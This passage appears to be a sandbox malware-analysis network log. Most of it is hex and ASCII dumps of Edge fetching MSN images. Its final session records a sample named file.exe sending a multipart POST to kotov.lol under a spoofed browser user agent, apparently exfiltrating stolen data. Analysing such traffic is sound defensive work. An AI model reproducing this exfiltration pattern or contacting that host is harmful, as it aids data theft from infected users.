2024-11-29 11:28:13 UTC	2473	IN	Data Raw: 1a 85 31 8d 7e 02 d9 d7 c0 de 09 64 5a 8f 4a bd 91 6c eb e0 5a 81 7c aa f6 95 fa 57 43 1e a9 3d 30 af 67 bf d8 57 45 ea 0d de 66 52 fb a9 33 79 f9 2b 4b 7d 03 bc ff 00 6c a7 f4 f1 82 58 c7 a6 7a 09 63 c7 83 92 3e 6b 2f 45 35 3e a4 23 e6 f6 51 ee 5c 63 bb 3f 0a 75 6d f1 6b e9 f7 f5 0c b2 bb e4 a8 f9 ca f4 53 4a e8 9f 89 93 e6 b3 bf 54 70 48 af 0f 73 cb dd 3e 26 df 9b a6 b2 87 f4 8e 2b cf cd 7f f6 56 64 eb ad df 5d 4f a5 8f c1 cf f7 47 e4 bc 5c 78 3d 05 84 af 69 0b 39 54 df 5d 1f 89 1e 78 90 57 81 c7 29 f6 4f 8b ff 00 18 77 bd 7e 5d 7f d9 4f 44 b1 7f bb e5 d6 96 fa 3c 4e 13 41 82 bc 0c 78 e4 5e 2e 5c 21 d8 7c f6 56 8a 2a 7d 48 cd f3 fb 32 d7 4b 39 90 c9 0f 61 51 b3 87 04 f8 b9 f1 85 d7 cf 66 e8 54 ae 89 ef 31 7c ce 6d 57 d4 fb bb 8a f6 49 05 e8 c2 3b 42 27 Data Ascii: 1~dZJlZ\|WC=0gWEfR3y+K}lXzc>k/E5>#Q\c?umkSJTpHs>&+Vd]OG\x=i9T]xW)Ow~]OD<NAx^.\!\|V*}H2K9aQfT1\|mWI;B'
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: 45 d7 53 ba d3 47 a7 b2 9b cb a6 30 74 da a9 68 6e 04 97 15 d7 a5 e0 9f e8 5b f4 29 1f 8b e4 5e 17 9b ce 59 cd a5 b5 65 a6 aa 9a 52 4f ca b4 d9 4a 56 3f 99 8b 0d 25 14 b5 67 1a 14 4c 36 f1 94 b6 cd d5 b8 47 a4 b1 fe 9d 1b fc ff 00 99 e9 de d3 d0 ee 32 69 35 99 53 5e 5a 5a 54 53 a1 3d af 77 b0 fc 58 2f 0a 5e 7e ca 52 94 45 15 26 a3 cd 66 97 7e c4 da 7a 26 56 83 2a a8 a5 d3 5e c9 d1 e6 99 d2 b4 55 17 b5 4a 58 69 3d 25 59 58 a5 52 4d a4 9d 72 a6 9a 14 df 45 3b 78 19 3c 8a 6a b4 a3 e9 a6 d5 2e fa aa 9d 3b 12 db 10 54 6e 42 67 6e 5c 0a f2 a1 d7 57 95 fa 74 d3 42 fd 34 a7 85 b6 f6 6c 6b 15 a4 ad 57 2e a8 84 e6 28 6a db 8f 36 64 e2 9d 2b f4 7e 66 e0 f4 9f db d0 ea c9 69 45 ba 21 2c 5a a5 3e 9c 56 dc 4c 17 2a 92 9c 70 9c a6 e7 ea a5 e8 4d e0 96 e9 65 c6 e7 9a 27 Data Ascii: ESG0thn[)^YeROJV?%gL6G2i5S^ZZTS=wX/^~RE&f~z&V^UJXi=%YXRMrE;x<j.;TnBgn\WtB4lkW.(j6d+~fiE!,Z>VLpMe'
2024-11-29 11:28:13 UTC	8048	IN	Data Raw: 3e f7 2d 77 22 7b ef 78 2e 80 24 f7 8d 97 75 e9 11 2c 1a c6 a7 53 e9 a7 72 6a 3b 99 a5 fb f8 79 69 0f be ea 70 5d 2c 0c 8a 56 9e 3b c1 76 2f c2 07 e1 87 f4 f8 b2 6b fa 9f 80 8e c9 1a 2f 6f 42 23 a1 2d 38 ec 89 eb 1f 87 5b f9 13 09 6a 5a 51 fc d5 3d 88 46 0e 62 3c b3 84 bf 82 f8 8d 8a fb 5c ee 8c 10 9e db af 6c 31 2e fc 76 b1 1b 59 57 6e 6d ee f1 63 6d d0 e1 5f a1 6f 7a 38 23 3b 55 60 94 60 e2 62 f1 eb aa cc 53 18 af 35 6f 0b b4 10 a8 68 9f cb f2 d2 af 7e 03 a6 9d 9c 36 c2 d2 f7 bd c6 3a 54 4a 4f 19 77 7c df 70 ea 1c ec d3 c1 68 e9 25 4d d3 bb 4c cb 5b e3 e0 b4 6d 61 4e 16 db 92 df 56 96 64 aa d3 76 df cb 4f e9 5b c6 98 5e c9 6b df a4 93 6d b7 4e 2a 5e d7 b1 07 ab 6e ef d9 7b 99 dd 3f 97 bd e8 1b 6a e3 d7 b7 82 d0 49 9f 86 cc 37 6f 7b d8 dd da 38 6b 7b 11 Data Ascii: >-w"{x.$u,Srj;yip],V;v/k/oB#-8[jZQ=Fb<\l1.vYWnmcm_oz8#;U``bS5oh~6:TJOw\|ph%ML[maNVdvO[^kmN*^n{?jI7o{8k{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49828	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:12 UTC	634	OUT	GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:13 UTC	519	IN	HTTP/1.1 200 OK Last-Modified: Mon, 16 Sep 2024 13:47:16 GMT Access-Control-Allow-Origin: * X-Datacenter: eastus X-ActivityId: ff79e93a-9960-4b77-a778-af0a49b23005 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msFQA X-Source-Length: 67183 Content-Length: 67183 Cache-Control: public, max-age=268197 Expires: Mon, 02 Dec 2024 13:58:09 GMT Date: Fri, 29 Nov 2024 11:28:12 GMT Connection: close
2024-11-29 11:28:13 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: d3 5f 5b a3 b9 4e 4b 44 b6 25 ed b9 ea c3 8b fa b2 eb f0 8a 5d d8 7f 89 9f 01 1f a8 f1 90 dd 5e a7 3b bf cc f5 69 fd 77 8c 86 f7 19 ad 71 f7 58 e3 38 65 d6 32 eb 19 c4 76 fb b8 f1 dc 5f 2b 81 ab cc d3 f9 9d 2b 8e ab ff 00 e9 f1 1d 91 f7 9f 25 0f f8 89 f2 e8 df f6 65 ef 47 a3 1f f8 83 87 7d 68 54 8f 32 7e d3 8c e1 97 fe 5d 63 3c 7b 7b 6f 8e ad ff 00 e9 f1 1f e5 f7 87 df 78 9c b8 2a dc f2 82 f6 9c b1 fa cf 05 2f ee 5b bd 35 ec 3b a3 f5 0e 16 5b ab 43 fa 91 ce a7 ff 00 3f 9b 77 1d b9 5f 17 c7 be af 05 db 51 18 f9 df 56 93 c3 87 a3 1e f9 7f f9 1e da e2 29 cb 74 a2 fb 9a 35 f3 23 a4 5f a4 2f f2 f0 94 be ae f9 3c 3a e7 7e f3 b6 9a e3 ef eb fb bd b5 39 df e4 7a 3b 6b 49 5b 68 97 e9 05 2a d2 d2 3b 3d 24 6d 0f 68 c2 aa c3 b1 37 0b 90 55 86 4d ca b8 0c 04 30 18 c9 Data Ascii: _[NKD%]^;iwqX8e2v_++%eG}hT2~]c<{{ox/[5;[C?w_QV)t5#_/<:~9z;kI[h;=$mh7UM0
2024-11-29 11:28:13 UTC	2358	IN	Data Raw: 9c b7 b6 cc ca 6c cc ac 90 00 82 19 23 00 a0 43 11 00 00 05 00 08 40 30 10 ca c8 10 ee 22 d0 60 20 2a 18 80 45 4b 50 12 32 80 04 74 c6 94 e6 d5 90 1c e0 7b 74 f8 29 3c 5e af 8e 8d 27 ad 0e 16 9c 15 f7 ee df d3 e4 73 9c e1 bd 66 5f 2f 1a 53 96 47 a7 0e 06 4d bd ae 4d ae bf 1f 99 f4 f0 82 4d d9 62 96 36 cb bb 28 fc cc d6 29 46 1b 32 57 eb 3f cb 8f 8a 5f 69 eb 39 4e 73 2e b1 84 38 69 f0 74 e2 d5 f1 ba 78 e4 b4 24 b7 b6 f2 6f 2c 4f 42 9d 28 a5 18 da db 56 95 45 9b b6 4d f2 62 81 cf cc bf 96 fd 2a fb 55 e5 9e 1c 9b e5 95 fb 05 1f 54 56 cf a6 92 b4 a7 52 78 39 db 3c 79 37 ed ee 39 4c cb a4 44 43 aa 36 bc f3 7b 4e 4a 3b ba db 95 fa 59 09 3b 6c df 7a 84 dd 92 e5 4b d2 9b 5a 37 da e6 49 ed 47 6a 2f 62 9a 77 95 49 61 29 e3 8b 57 dd 7d 2f 17 90 ef 75 b5 1f d3 86 e7 Data Ascii: l#C@0"` EKP2t{t)<^'sf_/SGMMMb6()F2W?_i9Ns.8itx$o,OB(VEMbUTVRx9<y79LDC6{NJ;Y;lzKZ7IGj/bwIa)W}/u
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: 46 92 5e b8 e0 9c e2 ad 15 94 13 f7 91 9c 94 5f a9 f5 ea 3c b5 2d 7a 16 45 02 7b 55 27 15 8e ce 12 96 57 b5 ed 7d 5a 37 20 be d5 da 76 8a c3 6b 4e a8 ea 1e ca d9 d8 58 41 6f c7 17 de f4 3c f3 65 66 be 1f 82 cb bd 90 43 c7 0b 59 78 3d b2 f7 0f 7b be 6b 3c 92 d5 ef 04 e2 e3 39 2e ac 2f 7e f5 be da 5e b0 83 52 8e db c2 36 ba bf cf 58 07 cb e3 2f c0 33 d2 f4 2d cb bd 82 bb bb dc de 9d fb 3a 5f 84 4d ab 39 3c 21 c9 59 c9 fb 6f 92 03 f0 90 15 c0 f6 9e 61 80 80 06 32 40 81 80 8a 28 92 80 08 18 08 44 43 28 43 34 10 00 c2 90 c6 20 86 31 01 14 c0 00 a0 24 60 19 05 08 02 98 08 61 00 80 00 63 01 80 80 62 0a 63 18 c0 45 00 04 21 81 40 2b 16 20 00 0d e1 6d 25 00 25 61 88 41 14 21 08 8a 40 00 4b 00 c4 22 34 77 10 86 40 87 71 5c 90 00 10 80 00 40 03 10 00 00 5c 42 2a 59 Data Ascii: F^_<-zE{U'W}Z7 vkNXAo<efCYx={k<9./~^R6X/3-:_M9<!Yoa2@(DC(C4 1$`acbcE!@+ m%%aA!@K"4w@q\@\B*Y
2024-11-29 11:28:13 UTC	16192	IN	Data Raw: a5 4e 32 77 95 a5 36 b4 47 75 97 6d 88 34 fc b6 a7 3f 55 59 e1 15 fe 15 a9 66 c1 7e 8b 72 7e ba b5 3d 9b 96 a8 a2 14 b7 d5 92 bc 9e 10 8e 69 68 e7 de c7 7f 25 6d 4a d2 ab 3c 12 f6 6a 8a cd 91 52 d3 a3 4e 51 4f 6a ad 5b e3 ad e1 7c 37 46 2b 70 e4 9c 29 d3 a1 17 79 bb 2d ad 09 75 a5 ab f1 05 6a 11 da 9f aa a4 b0 d6 f4 28 ea e8 c2 17 a1 79 cb d5 56 6f 72 f9 2d 4b 32 8d 95 9d 92 fc b8 7f 9a 5e d0 57 72 db 6a ed 75 63 92 ef d6 73 45 79 11 d9 5e aa 95 1b 69 64 af f2 8c 4b 9b f2 20 a9 c3 d5 52 a5 f1 d7 9c 9f 70 1b 53 5b 5c 4c a4 f1 4a 29 5f c2 f3 8a f9 98 f0 df a9 56 bd 67 bd 4a 54 e3 fb 30 f7 bb 84 df dd a8 28 47 19 c9 6c c6 fb dc 9e 6f e6 c2 cf 86 e1 d5 38 63 52 4b 65 6b 6f 7c 9f cd 80 f8 59 79 b1 9d 48 e1 2a 8d ed 3f 0d b0 b7 37 cc ba 6d 4e 2e 30 c2 09 b4 df Data Ascii: N2w6Gum4?UYf~r~=ih%mJ<jRNQOj[\|7F+p)y-uj(yVor-K2^WrjucsEy^idK RpS[\LJ)_VgJT0(Glo8cRKeko\|YyH*?7mN.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49829	104.117.182.56	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:12 UTC	634	OUT	GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:13 UTC	521	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sat, 09 Nov 2024 07:00:50 GMT X-Datacenter: eastus X-ActivityId: 159929e5-a1cb-4d8f-afcb-c81ae7dd9906 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msKSh X-Source-Length: 116060 Content-Length: 116060 Cache-Control: public, max-age=243244 Expires: Mon, 02 Dec 2024 07:02:16 GMT Date: Fri, 29 Nov 2024 11:28:12 GMT Connection: close
2024-11-29 11:28:13 UTC	15863	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: dc b4 ba 4e d6 06 fd 6c 02 14 c9 bd 96 e5 ba dc 8d e3 b6 e8 89 2d ff 00 1e a1 c1 f0 f5 4b 6f 66 97 b0 db f8 3d 97 8e a1 46 cf df 87 c9 30 97 99 73 e3 ad a6 d9 89 2d 07 84 89 54 4b bc ad 2e 32 68 26 e7 2b 09 92 b6 c1 44 62 f3 13 c8 49 e5 70 15 68 2e 21 a0 12 4d 00 12 49 e8 2a 8e e0 f6 37 07 e3 73 89 98 48 73 63 f9 4b 44 4e d3 c5 02 5d 15 30 7a 98 b7 c9 4d a0 c3 10 c4 08 87 0a cc 02 38 b4 89 f9 2d 69 76 8b 81 22 0d c7 99 ad 77 fe 97 4d f6 24 21 e2 76 10 d9 10 09 81 22 44 d4 ef 7e a8 8e 6b ac 5a 5a 65 a2 43 65 ad 07 f8 92 60 13 99 8b 20 ae c2 e0 e3 89 c4 c8 00 38 03 2d ea ec 46 08 a4 5f 8a c1 88 d0 3a 48 22 00 fd b1 94 5d 0d a6 ff 00 8e 39 9f 29 9e db 10 6d 5d 92 8c ed 92 0d b6 e6 fd 91 db 3e 09 dc 69 e6 2e b4 c1 9f 2c e5 70 27 95 92 0c 44 61 6c f9 8d 37 22 Data Ascii: Nl-Kof=F0s-TK.2h&+DbIph.!MI*7sHscKDN]0zM8-iv"wM$!v"D~kZZeCe` 8-F_:H"]9)m]>i.,p'Dal7"
2024-11-29 11:28:13 UTC	2373	IN	Data Raw: 71 04 03 17 3c 43 a3 de 4a b5 92 05 29 b8 b0 9b d7 f1 36 b6 70 86 6c 4d 40 37 13 b6 46 f5 b2 06 b8 31 61 4a a9 05 d7 33 73 7b 89 82 77 be fd a8 2d 92 49 8b 45 f8 1e 22 be 29 85 89 cc 67 b1 cc 4c e5 9d 10 52 31 52 e4 f5 a4 67 1e c2 66 db f2 04 c7 08 1c 63 c7 75 b8 6c d2 21 dd 83 39 8b 5f c5 2b aa 37 cc 5c e7 65 96 93 41 b6 16 dc 1b 91 02 a4 52 d3 45 ae 75 ab 5e 9d 9f 4b 21 e9 e1 c2 41 02 66 d2 4e c6 7a 57 a7 44 7c c4 89 9d fc 0d 66 ca 82 b5 b8 c4 fe 30 2d f4 eb c4 a9 43 5e 72 e3 ba 87 e6 88 6b 8b 9a 4c 13 73 5c 89 81 9d fa a2 34 10 09 13 6b 5b dd 14 5d a4 f9 dd 51 02 36 02 3b 02 3b 49 61 02 48 c8 8a 72 34 51 01 c3 18 45 c8 ce f5 da 0d 95 6b dc 2f 37 1e f8 ae 6d ba b8 e6 c4 10 3b b8 db 64 9a 61 b8 bc b6 c5 58 b5 8c d4 99 b0 a2 8d a4 71 3d b2 4d 61 c1 bf c7 Data Ascii: q<CJ)6plM@7F1aJ3s{w-IE")gLR1Rgfcul!9_+7\eAREu^K!AfNzWD\|f0-C^rkLs\4k[]Q6;;IaHr4QEk/7m;daXq=Ma
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: 46 9c 26 12 d3 62 88 cd 3c 78 bc cc 6c 34 bb cc e8 98 c8 6e 76 0a 8a dc 38 5c 1d 33 12 d3 78 ea 20 0f 19 00 21 42 24 50 88 33 22 26 4d 85 4d 39 2a 7f 2a 8e 3e c2 05 68 b8 98 e6 60 73 85 a2 09 18 8c 5c 49 ac 0d f2 44 92 e2 31 3a c2 c2 4d 00 f7 44 3a 19 13 d0 fd d0 14 7f 90 89 2c 60 02 c4 8c 20 c5 ef 84 13 27 73 da 84 5a 41 c8 e5 6a 22 33 4d da 8e c2 d1 26 f5 20 01 02 4f 98 90 12 03 7b d2 0d 2d 97 0e d4 0b 10 6e 9a b3 17 ed fd 11 5c 1c e7 39 da 8e 33 69 c5 25 c6 82 06 2b 92 07 82 0d a6 fe c2 2b 60 c5 39 e7 de a8 9d 32 08 22 62 b6 35 1e 05 57 19 36 98 ca c0 5b 2b 0f 15 41 83 30 38 1b 84 42 81 29 a0 c4 c0 ac 0b 89 ec af 3a 26 00 41 93 7b 46 dc d2 10 83 69 6b 2c 5a 5b 11 70 6d 36 33 c8 f5 5b 62 45 eb d8 3b d0 59 f7 f4 4f 33 33 73 6b 84 ae c3 fb 4b 88 dc 88 e1 Data Ascii: F&b<xl4nv8\3x !B$P3"&MM9**>h`s\ID1:MD:,` 'sZAj"3M& O{-n\93i%++`92"b5W6[+A08B):&A{Fik,Z[pm63[bE;YO33skK
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: 64 2b 84 c9 91 d1 dd 78 da bd 60 71 5d 2f 86 4b 48 3f 93 7b 63 a8 db ad d5 73 44 cd 49 e7 3c 72 3e 25 5d b3 a7 3a 29 22 e0 9e 63 f8 9c ed b8 94 3c 1f 4f 97 e9 d8 ba 5f 0a e6 00 39 91 97 23 97 3e c4 bf 0f f2 b9 81 43 15 e8 46 71 d1 36 69 cf c3 1c bc 3d f2 e0 b2 23 a4 78 70 db dd 94 ff 00 86 6d 06 e6 9d 47 43 9f f4 d9 2f c3 34 11 d3 28 e9 d0 f4 b2 6c d2 0c 11 ef df 87 35 6f 6e 9e fd 8a 29 b8 33 8b 7b ec 3e e1 2e 11 6b 4e fd 7e be 1d 15 44 7a e5 d7 87 d0 e6 32 c8 ad f9 1b 6d f4 28 d8 0e c7 e6 ae 03 7e 82 79 7d c7 b9 41 1e d7 e0 3b 7d d0 ab ef 8f e8 a4 60 8b 5a d7 fa 75 1e 23 aa 4c 1d 3d ec 7e c7 b5 00 ae b7 17 d9 3e 18 f7 ee fe ee b2 29 d9 ef df 62 a8 d6 9a 56 d3 d8 b6 68 91 60 27 ec 80 c1 e6 0f 40 3e a8 d8 88 9a d8 81 da a1 e2 b7 bf 7c 16 cf be 1f 70 a0 9c Data Ascii: d+x`q]/KH?{csDI<r>%]:)"c<O_9#>CFq6i=#xpmGC/4(l5on)3{>.kN~Dz2m(~y}A;}`Zu#L=~>)bVh`'@>\|p
2024-11-29 11:28:13 UTC	7952	IN	Data Raw: 4a 96 c4 8e 60 f7 a6 70 c6 b9 ba da c7 d4 3e 4c 09 36 e7 92 95 e9 f4 c8 3c 73 df a1 0a 46 bf a0 0f 25 de 9f 8f c3 99 b6 ed 39 f0 50 bd 3f ab 76 89 87 89 8c cd 42 6f 73 8f b2 75 79 7b 0d 42 3d 3f a7 2d 71 12 ec af d9 55 e2 c4 97 df cd d1 77 7d 49 fe f5 b8 98 e1 39 89 f2 93 c6 6d cd 70 b0 bf 41 f1 a8 d7 09 88 3c f2 34 3c 42 ce 33 8b ee d6 4f 5b e9 5a e2 43 45 41 ad 62 33 ea 12 ff 00 d9 6a 89 00 3a 99 01 45 27 d0 bd 8f 04 b4 83 e4 b1 cf b2 ab cb fa c7 93 ac e2 72 f0 58 93 79 2d ae 8f a4 71 70 83 1d 1d 91 e9 1f 65 e8 de 3f b8 f4 e6 c7 13 47 31 d1 79 ef 46 5b 13 df c2 93 45 df f5 9a ce d2 d2 69 6d b1 08 ea 54 bd af c3 a9 e8 b5 be 3e 88 fe 4c f2 bd b9 82 3c 6e a7 47 e8 bc 0f a3 f5 6f 6b a4 12 0d 3a 2f 6f a1 ac 35 85 e0 3b bd 66 cd 31 7d c6 80 46 e8 52 ed 3a f9 Data Ascii: J`p>L6<sF%9P?vBosuy{B=?-qUw}I9mpA<4<B3O[ZCEAb3j:E'rXy-qpe?G1yF[EimT>L<nGok:/o5;f1}FR:
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: 93 33 94 fb f7 4e c5 43 cb 62 a3 a8 36 ed 3d c5 04 71 f7 ef 75 93 ef df d5 04 af 88 5d 22 07 08 f1 8c 94 63 73 7a f7 ac 98 e1 dd f2 e5 d8 b4 bc 18 90 0f 87 b2 81 0e fd eb 1d 07 28 4d 3e fe 69 5c 5a 62 44 70 fb 2a 85 86 ef f4 59 84 67 96 de fb 90 8b 86 52 b2 56 90 c7 b5 58 04 2c 99 43 a1 d9 02 1b 74 55 3c ef ef e4 94 b5 b9 59 69 92 c1 da 55 58 41 19 ac 41 4f 14 aa d5 64 14 1e 15 6a a9 84 af 63 e7 31 11 ad 95 a1 bb a2 e2 02 c1 46 96 c0 24 2e 4a 5c 86 83 49 94 aa aa 88 aa ad 09 80 40 a8 ec 64 94 cd d3 dd 10 b8 70 46 9a 69 6a 04 22 b1 ce 40 26 54 1a 4a 55 89 95 46 26 58 11 d8 cc 46 10 20 69 2a 5b 58 05 6f 9a 24 45 80 a2 19 30 b2 d9 9c e4 07 6a 13 69 41 25 24 ca a9 b3 13 29 55 5a ab 2d 5b 09 c0 94 48 e8 a3 45 88 b8 bf bc 94 86 36 d2 47 b2 b1 91 e2 a4 3a 40 ae Data Ascii: 3NCb6=qu]"csz(M>i\ZbDpYgRVX,CtU<YiUXAAOdjc1F$.J\I@dpFij"@&TJUF&XF i[Xo$E0jiA%$)UZ-[HE6G:@
2024-11-29 11:28:13 UTC	16384	IN	Data Raw: a6 31 92 7a 19 ae 67 6b 0f 92 47 bb 15 48 04 08 e6 06 67 39 2a fc 4c 56 d5 f3 0c a6 64 70 cc 78 ac fa af a3 91 69 d9 32 57 81 88 81 44 d1 4f 7e ec ba b8 1c 13 43 db c3 74 ec 27 f6 c9 e8 93 88 a5 bc 11 19 6f 31 cc 5a d7 b7 35 1a 17 e2 df 0b 83 76 06 29 ef ad d3 bf 4d b6 0d 34 bd 6b c3 ec 86 df 33 86 fc 04 78 a3 ea 34 40 75 c4 5a dc b3 9e de 4b 2d fc 01 84 b2 f0 6f 15 e0 ba fa 4f 73 5a 00 83 4b 19 83 cc 57 ea a3 69 3e 4b c5 43 80 06 b1 06 92 6f 9c 71 45 d4 d2 87 c4 e7 02 0c c7 02 2c 7b 56 6b 78 f1 cc 75 b1 fc 36 62 00 c6 a3 73 ce 49 9c c8 b7 48 5e 7b 56 d5 10 7b 78 5a 17 59 d6 d1 6d 41 89 9b 8e d1 be db ae 16 ab a5 e7 6b d8 52 38 6c b3 8b 59 d2 48 11 51 ee 2a 56 03 11 07 c1 2f 54 c0 8a c5 17 57 01 24 71 9c f8 7b b2 23 20 cc c5 c1 1c 0f 25 1c 53 c7 f5 53 b4 Data Ascii: 1zgkGHg9LVdpxi2WDO~Ct'o1Z5v)M4k3x4@uZK-oOsZKWi>KCoqE,{Vkxu6bsIH^{V{xZYmAkR8lYHQV/TW$q{# %SS
2024-11-29 11:28:13 UTC	7952	IN	Data Raw: 61 55 58 b5 05 55 62 d4 15 32 b0 b1 41 b5 44 6d 21 64 59 68 0a 34 d5 d1 69 86 d8 09 91 9d c4 70 b0 50 05 ec a7 c7 91 b5 bd a2 87 8c 0c b2 1b c2 cd 6e 04 46 1d a3 8c f7 28 ee 03 7a ee a4 38 8b db 28 f7 b2 88 63 82 a9 41 4a 9a 89 55 65 53 2c 5a 10 6c 6c b7 ad 92 f2 5a 2e 2a 81 9b 72 9f 0c f5 41 a2 34 84 56 ce 43 3a 8e ab ad a0 ef 29 07 8c 46 62 97 17 f7 75 c9 1f 90 af 0c d7 4f 4c 86 83 36 99 3d 6d 15 06 92 28 42 c5 6f 15 3c 26 2e 76 c9 44 73 70 99 ae 7d 0c fd 94 cc 25 e0 b8 48 88 e5 b1 26 8a 2b 8d a2 2e 77 af 6f 7a 2d 44 30 4a 12 23 8d ca 1c 2d b9 b5 3c de 7b ba 24 94 c2 c8 86 8e 94 f7 45 40 24 1a db dd 82 a0 d6 c2 f6 be 5d 46 df 55 4f 0e 05 14 61 76 9a 15 d2 f4 a3 03 89 13 31 13 52 2f 5c ea 2c b9 4c b7 cd 76 bd 3f e2 f8 75 c9 0d da 26 b9 c8 e2 b9 de 9d 31 Data Ascii: aUXUb2ADm!dYh4ipPnF(z8(cAJUeS,ZllZ.*rA4VC:)FbuOL6=m(Bo<&.vDsp}%H&+.woz-D0J#-<{$E@$]FUOav1R/\,Lv?u&1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49830	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:13 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
